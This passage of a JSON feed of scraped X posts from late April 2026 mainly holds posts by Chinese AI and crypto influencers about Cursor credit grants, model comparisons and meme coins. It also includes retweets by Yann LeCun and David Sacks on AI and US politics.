"0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + "url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 